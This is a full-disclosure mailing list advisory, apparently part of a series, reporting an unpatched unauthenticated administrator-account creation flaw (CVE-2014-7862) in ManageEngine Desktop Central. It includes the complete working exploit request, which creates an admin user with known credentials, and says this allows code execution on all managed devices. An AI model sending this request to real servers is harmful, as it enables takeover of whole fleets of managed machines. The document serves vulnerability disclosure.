Hi,
This is part 10 of the ManageOwnage series. For previous parts, see [1].
This time we have a vulnerability that allows an unauthenticated user
to create an administrator account, which can then be used to execute
code on all devices managed by Desktop Central (desktops, servers,
mobile devices, etc).
An auxiliary Metasploit module that creates the administrator account
has been released and its currently awaiting review [2]. I will leave
to someone else the task of creating an exploit that executes code on
all managed devices (it's not hard to write but testing it properly
might take a fair few hours).
I am releasing this as a 0 day as 112 days have elapsed since I first
communicated the vulnerability to ManageEngine. I received many
promises about getting updates but they were very evasive (a
disclosure timeline is at the bottom of this email). The full advisory
text is below, and a copy can be obtained from my repo [3].
Regards,
Pedro
Disclosure: 31/12/2014 / Last updated: 31/12/2014
>> Background on the affected product:
"Desktop Central is an integrated desktop & mobile device management
software that helps in managing the servers, laptops, desktops,
smartphones and tablets from a central point. It automates your
regular desktop management routines like installing patches,
distributing software, managing your IT Assets, managing software
licenses, monitoring software usage statistics, managing USB device
usage, taking control of remote desktops, and more."
This vulnerability is being released as a 0day since ManageEngine
failed to take action after 112 days. See timeline for details.
>> Technical details:
Vulnerability: Administrator account creation (unauthenticated)
CVE-2014-7862
Constraints: none; no authentication or any other information needed
Affected versions: all versions from v7 onwards
GET /servlets/DCPluginServelet?action=addPlugInUser&role=DCAdmin&userName=dcpwn&[email protected]&phNumber=123456&password=8fR%2bRoOURmY0EXsX%2bCmung%3d=&salt=1401192012599&createdtime=1337
This creates a new administrator user "dcpwn" with the password
"admin". You can now execute code on all devices managed by Desktop
Central!
A Metasploit module that exploits this vulnerability has been released.
>> Fix:
UNFIXED - ManageEngine failed to take action after 112 days.
Timeline of disclosure:
11/09/2014:
23/09/2014:
17/10/2014
30/10/2014
23/11/2014
31/12/2014
[1]
http://seclists.org/fulldisclosure/2014/Aug/55
http://seclists.org/fulldisclosure/2014/Aug/75
http://seclists.org/fulldisclosure/2014/Aug/88
http://seclists.org/fulldisclosure/2014/Sep/1
http://seclists.org/fulldisclosure/2014/Sep/110
http://seclists.org/fulldisclosure/2014/Nov/12
http://seclists.org/fulldisclosure/2014/Nov/18
http://seclists.org/fulldisclosure/2014/Nov/21
http://seclists.org/fulldisclosure/2014/Dec/9
[2]
https://github.com/rapid7/metasploit-framework/pull/4493
[3]
https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_dc9_admin.txt